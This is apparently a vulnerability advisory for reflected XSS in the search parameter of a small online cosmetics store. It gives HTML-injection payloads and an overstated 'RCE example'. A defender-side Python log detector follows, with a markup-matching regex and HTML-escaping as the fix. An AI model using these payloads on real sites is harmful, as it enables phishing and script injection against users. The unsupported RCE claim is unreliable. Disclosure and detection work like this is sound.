Cosmetics-and-Beauty-Product-Online-Store
Vendor
Description:
The `search` parameter of the /cbpos/ application in Cosmetics and Beauty Product Online Store v1.0 appears to be vulnerable to multiple reflected cross-site scripting (XSS) attacks.
An attacker can use this XSS vulnerability to extract very sensitive information from the system and can even use it to stage a very dangerous RCE.
Status: CRITICAL
[+] Payloads:
<a href="https://www.malicious_site.com/">Please visit our beauty store!</a>
<a href="https://www.nu11secur1ty.com/"><img src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif">
- RCE example:
<a href="http://192.168.1.8/cbpos/uploads/product_4/banner.3.jpg"><img src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif">
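Added defender-side example, not part of the advisory and not the application's own code: it flags access-log requests whose `search` parameter carries HTML markup (the reflection point named above) and shows the output encoding the application should apply before echoing the term. The log lines, IP addresses and the `page=products` query key are constructed assumptions; only the /cbpos/ path and the `search` parameter come from the advisory.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from the advisory). The third one
# carries an anchor tag in the search parameter, percent-encoded as a browser
# would send it.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cbpos/?page=products&search=lipstick HTTP/1.1" 200 5120
192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /cbpos/?page=products&search=face%20cream HTTP/1.1" 200 4980
192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /cbpos/?page=products&search=%3Ca%20href%3D%22https%3A%2F%2Fexample.invalid%2F%22%3Evisit%3C%2Fa%3E HTTP/1.1" 200 5210
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markup that has no business in a plain product search term: a tag opener,
# a javascript: URL, or an inline event handler attribute.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z]|javascript:|on\w+\s*=", re.IGNORECASE)


def suspicious_search_requests(log_text, path_prefix="/cbpos/", param="search"):
    """Return (client_ip, decoded search value) for each request under
    path_prefix whose search parameter contains HTML or script markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        if not target.startswith(path_prefix):
            continue
        # parse_qs percent-decodes once; unquote again so a double-encoded
        # payload (%253C ...) is not missed by the markup check.
        for value in parse_qs(urlsplit(target).query).get(param, []):
            decoded = unquote(value)
            if MARKUP_RE.search(decoded):
                hits.append((line.split()[0], decoded))
    return hits


def render_search_term(user_input):
    """The fix on the application side: HTML-encode the term before
    reflecting it, so '<', '>', '&' and quotes reach the browser as entities
    and the payload is displayed as text instead of being parsed as markup."""
    return "Results for: " + html.escape(user_input, quote=True)
```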
